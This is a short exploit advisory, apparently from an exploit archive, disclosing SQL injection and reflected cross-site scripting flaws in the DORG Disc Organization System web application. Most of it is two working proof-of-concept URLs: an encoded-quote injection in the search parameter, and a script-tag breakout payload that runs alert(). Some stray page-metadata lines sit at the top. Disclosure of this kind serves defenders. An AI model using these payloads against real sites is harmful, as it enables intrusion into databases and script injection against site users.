19 lines
No EOL
639 B
Text
19 lines
No EOL
639 B
Text
Exploit Title: DORG - Disc Organization System SQL Injection And Cross Site Scripting
|
|
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=479
|
|
Author: SECUPENT
|
|
Website:www.secupent.com
|
|
Email: research{at}secupent{dot}com
|
|
Date: 20-3-2016
|
|
|
|
|
|
SQL Injection:
|
|
|
|
link: http://localhost/dorg/results.php?q=3&search=%2527&type=3
|
|
|
|
Screenshot: http://secupent.com/exploit/images/drogsql.jpg
|
|
|
|
Cross Site Scripting (XSS):
|
|
|
|
link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&search=Search&type=3
|
|
|
|
Screenshot: http://secupent.com/exploit/images/drogxss.jpg |